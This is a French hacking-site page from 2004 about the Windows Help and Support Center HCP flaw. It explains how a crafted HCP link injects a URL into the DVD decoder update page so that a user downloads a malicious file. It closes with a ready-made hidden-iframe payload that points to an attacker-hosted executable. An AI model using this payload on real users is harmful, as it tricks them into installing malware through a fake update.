Hacking  |   Cracking   |   Film  |   Forum   |   Download         
Home

  Accueil
  Partenaires
  Forum
  Contact


Hacking

  Théorie
  Hackers légendaires
  Pratique
  Autres


Cracking

  Théorie
  Pratique
  Crack me

Hacking - Faille HCP

· QUne faille encore exploitable sur certains OS donc faites pas de bêtises :p

Microsoft Windobe Help and Support Center Remote Code Execution

Une vulnérabilité a été indentifiée danhs Microsoft Windobe. Elle pourrait être exploitée par
par un attaquant afin de compromettre un système vulnérable. Ce problème se situe au niveau du centre d'aide
et de support qui ne valide pas correctement certaines URLs HCP. Un attaquant pourrait exploiter cette vulnérabilité
afin de télécharger puis exécuter des fichiers malicieux sur une machine vulnérable (via la mise à jour du décodeur de DVD)
en incitant un utilisateur à visiter une page web ou à lire un mail contenant un lien HCP spécifique. La désactivation du protocole
HCP via le registre empêchera l'exploitation de cette vulnérabilité mais cette démarche est déconseillée car elle pourrait
entraîner certaines disfonctionnement.

Microsoft a jugé le risque comme "important" nous l'avons jugé comme "moyen" car l'exploitation de cette faille
exige une importante intercation de la part de l'utilisateur. Un attaquant pourrait exploiter ce oroblème incitant
un utilisateur à visiter une page web (ou à lire un mail) contenant un lien HCP spécifique. Ce lien lancera le centre
d'aide et de support (Mise à jour du décodeur DVD) puis y injectera une URL malicieuse. L'attaquant devra ensuite convaincre
l'utilisateur de cliquer sur le bouton "Mettre à jour maintenant". L'utilisateur croyant télécharger une mise à jour téléchargera
en réalité un fichier malicieux (via l'URL injectée auparavant).

<iframe src="http://system/DVDUpgrd/dvdupgrd.htm?website=site.com/tonfichier.exe" width="1" height="1"></iframe>

Source : The Hackademy Journal



visiteurs connectés sur le site

WebDesign © 2004